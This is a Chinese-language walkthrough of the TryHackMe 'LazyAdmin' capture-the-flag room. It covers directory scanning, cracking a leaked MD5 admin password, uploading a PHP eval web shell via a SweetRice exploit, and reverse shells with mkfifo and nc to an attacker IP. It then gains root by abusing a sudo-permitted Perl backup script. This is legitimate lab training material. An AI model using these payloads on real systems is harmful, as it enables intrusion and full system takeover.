tryhackme--lazyadmin靶场wp

tryhackme lazyadmin

先用nmap扫描端口，得到22和80端口开放。

在浏览器打开ip地址，进入一个网页。但是这个网页事静态的，我们没法互动，所以下一步进行目录扫描。

用dirsearch进行目录扫描发现存在content目录：

我们进入content目录，在这里可以看出该网站使用的是weetrice CMS

但是依然没有找到有用的信息，再一次进行目录扫描，用gobuster进行目录扫描：gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php.html.js。（这里一开始我用dirsearch是扫不出来的）

发现下面还有好几个目录，查看后，可以在/as/下找到一个登录界面;

以及在/inc/目录下可以找到一个mysql_backup的文件夹：

推测为敏感备份文件，进入查看可以发现一个sql备份文件，下载查看可以在里面发现用户名manager与密码的信息，且密码为md5加密。

解密得到密码为Password123，使用用户名与密码以管理员的身份登录进网站

在这里其实可以根据mysql备份文件里的内容去Setting里的General中的Web settings里打开网站，但是在里面没什么用就是了:)

用searchsploit扫描sweetrice的漏洞：searchsploit sweetrice，发现里面有两个可利用的漏洞：文件上传和备份漏洞。

使用searchsploit sweetrice -m 40716.py打开文件上传对应漏洞的python代码得到进一步信息：在这里面我们可以发现它允许上传的的文件后缀名，且是在media-center上传。

前往media-center上传一句话木马文件a.php5：<?php @eval($_GET['a']);?>，打开木马文件地址，用phpinfo()测试是否能命令执行，可行。

执行ls,cat一系列命令拿到用户flag。

要拿根flag，我们先要有root权限，执行whoami命令，发现我们并没有这个权限。

现在进行提权操作。

在/home/itguy下发现一个备份文件，查看它发现它执行了/etc/copy.sh文件：

查看copy.sh文件，发现它执行了一个反弹shell命令。

修改这个反弹shell的命令，使其反弹到的主机ip地址为我们的主机地址：?a=system("echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.218 8080 >/tmp/f' > /etc/copy.sh")；(使用hakctools工具生成)，(记得要url加密)，可以再次打开一个网页查看copy.sh文件看看是否修改成功，可以看到主机ip和端口已经被修改了：

在主机使用nc监听端口，执行反弹shell命令：?a=system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.218 4040 >/tmp/f")，可以看到已成功监听到：

在本地执行命令sudo-l，看到可以以root权限执行backup.pl而不需要密码：

而backup.sh文件又指向copy.sh，如果我们执行backup.pl，就会执行copy.sh，也就会执行copy.sh中的反弹shell命令，这时就是再次反弹了一次shell。所以我们再开个监听端口监听copy.sh反弹的shell，并执行backup.sh:sudo /usr/bin/perl /home/itguy/backup.pl

发现成功监听，并且我们具有了root权限，就可以去root文件夹拿根flag了。